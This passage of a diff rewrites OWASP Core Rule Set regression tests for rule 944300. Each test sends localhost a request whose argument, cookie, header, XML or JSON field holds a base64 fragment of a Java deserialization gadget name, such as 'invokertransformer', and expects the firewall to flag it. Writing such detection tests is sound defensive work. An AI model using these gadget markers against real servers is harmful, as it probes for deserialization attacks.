944300-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 175 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 176 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 177 desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 178 desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 179 desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-180 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 180 desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 181 desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 182 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 183 desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 184 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-185 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 185 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 186 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 187 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 188 desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-189 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 189 desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - test_id: 190 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 191 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 192 desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 193 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-194 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 194 desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 195 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-196 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 196 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 197 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-198 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 198 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 199 desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: 